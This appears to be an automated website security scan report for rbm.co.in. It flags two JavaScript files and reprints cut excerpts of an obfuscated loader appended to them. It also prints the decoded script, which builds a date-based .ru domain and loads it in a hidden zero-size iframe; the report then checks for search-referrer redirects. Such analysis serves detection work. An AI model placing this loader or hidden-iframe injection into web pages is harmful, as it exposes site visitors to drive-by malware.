Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rbm.co.in
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
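Scanned pages/files
Note: rows whose path contains html/../ resolve to the same files as the earlier rows (same Content-Length and same verdict), so the list below covers two distinct infected scripts, Scripts/AC_RunActiveContent.js and SpryAssets/SpryMenuBar.js. Files the crawler did not reach are not covered by this list.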
Request | Server response | Status |
http://www.rbm.co.in/ | 200 OK Content-Length: 15365 Content-Type: text/html | clean |
http://www.rbm.co.in/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 13244 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt appears to be cut at the points marked [...]: it shows the start of the legitimate file, then the tail of an obfuscated loader that has been added to it.
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) [...]
r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s);
Decoded script (excerpt, also cut at [...]):
function nextRandomNumber(){var hi=this.seed/this.Q;var lo=this.seed%this.Q;var test=this.A*lo-this.R*hi;if(test>0){this.seed=test}else{this.seed=test+this.M}return(this.seed*this.oneOverM)}function RandomNumberGenerator(unix){var d=new Date(unix*1000);var s=d.getHours()>12?1:0;this.seed=2345678901+(d.getMonth()*0xFFFFFF)+(d.getDate()*0xFFFF)+(Math.round(s*0xFFF));this.A=48271;this.M=2147483647;this.Q=this.M/this.A;this.R=this.M%this.A;this.oneOverM=1.0/this.M;this.next=nextRandomNumb [...]
var domainName = generatePseudoRandomString(unix, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */
What the decoded script does: it seeds a pseudo-random generator from a timestamp (month, day of month and an hour-based flag), derives a host name from it (apparently 16 characters under "ru"), and loads http://<host>/runforestrun?sid=cx in an iframe that is hidden and sized 0px by 0px. Because the host name depends on the date, search proxy or web logs for the request path /runforestrun?sid= rather than for a single domain.
Antivirus reports:
| ||
http://www.rbm.co.in/SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 14946 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt appears to be cut at the point marked [...]: it shows the start of the legitimate Spry menu script, then the tail of an obfuscated loader identical to the one reported in Scripts/AC_RunActiveContent.js.
var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d [...]
r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s);
Antivirus reports:
| ||
http://www.rbm.co.in/index.html | 200 OK Content-Length: 15365 Content-Type: text/html | clean |
http://www.rbm.co.in/html/Contact_Us.html | 200 OK Content-Length: 28184 Content-Type: text/html | clean |
http://www.rbm.co.in/html/../Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 13244 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Decoded script: function nextRandomNumber(){var hi=this.seed/this.Q;var lo=this.seed%this.Q;var test=this.A*lo-this.R*hi;if(test>0){this.seed=test}else{this.seed=test+this.M}return(this.seed*this.oneOverM)}function RandomNumberGenerator(unix){var d=new Date(unix*1000);var s=d.getHours()>12?1:0;this.seed=2345678901+(d.getMonth()*0xFFFFFF)+(d.getDate()*0xFFFF)+(Math.round(s*0xFFF));this.A=48271;this.M=2147483647;this.Q=this.M/this.A;this.R=this.M%this.A;this.oneOverM=1.0/this.M;this.next=nextRandomNumb var domainName = generatePseudoRandomString(unix, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://www.rbm.co.in/html/../SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 14946 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Antivirus reports:
| ||
http://www.rbm.co.in/html/../index.html | 200 OK Content-Length: 15365 Content-Type: text/html | clean |
http://www.rbm.co.in/html/../html/Contact_Us.html | 200 OK Content-Length: 28184 Content-Type: text/html | clean |
http://www.rbm.co.in/html/../html/../Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 13244 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Decoded script: function nextRandomNumber(){var hi=this.seed/this.Q;var lo=this.seed%this.Q;var test=this.A*lo-this.R*hi;if(test>0){this.seed=test}else{this.seed=test+this.M}return(this.seed*this.oneOverM)}function RandomNumberGenerator(unix){var d=new Date(unix*1000);var s=d.getHours()>12?1:0;this.seed=2345678901+(d.getMonth()*0xFFFFFF)+(d.getDate()*0xFFFF)+(Math.round(s*0xFFF));this.A=48271;this.M=2147483647;this.Q=this.M/this.A;this.R=this.M%this.A;this.oneOverM=1.0/this.M;this.next=nextRandomNumb var domainName = generatePseudoRandomString(unix, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://www.rbm.co.in/html/../html/../SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 14946 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Antivirus reports:
| ||
http://www.rbm.co.in/html/../html/../index.html | 200 OK Content-Length: 15365 Content-Type: text/html | clean |
http://www.rbm.co.in/html/../html/../html/Contact_Us.html | 200 OK Content-Length: 28184 Content-Type: text/html | clean |
http://www.rbm.co.in/html/../html/../html/../Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 13244 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Decoded script: function nextRandomNumber(){var hi=this.seed/this.Q;var lo=this.seed%this.Q;var test=this.A*lo-this.R*hi;if(test>0){this.seed=test}else{this.seed=test+this.M}return(this.seed*this.oneOverM)}function RandomNumberGenerator(unix){var d=new Date(unix*1000);var s=d.getHours()>12?1:0;this.seed=2345678901+(d.getMonth()*0xFFFFFF)+(d.getDate()*0xFFFF)+(Math.round(s*0xFFF));this.A=48271;this.M=2147483647;this.Q=this.M/this.A;this.R=this.M%this.A;this.oneOverM=1.0/this.M;this.next=nextRandomNumb var domainName = generatePseudoRandomString(unix, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://www.rbm.co.in/html/../html/../html/../SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 14946 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rbm.co.in
Result:
GET / HTTP/1.1
Host: rbm.co.in
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: rbm.co.in
Referer: http://www.google.com/search?q=rbm.co.in
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rbm.co.in
Referer: http://www.google.com/search?q=rbm.co.in
Result:
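The result is similar to the first query. No suspicious redirects were found. This check compares only a direct visit with a visit carrying a Google search Referer; a redirect conditioned on other request properties would not show up here.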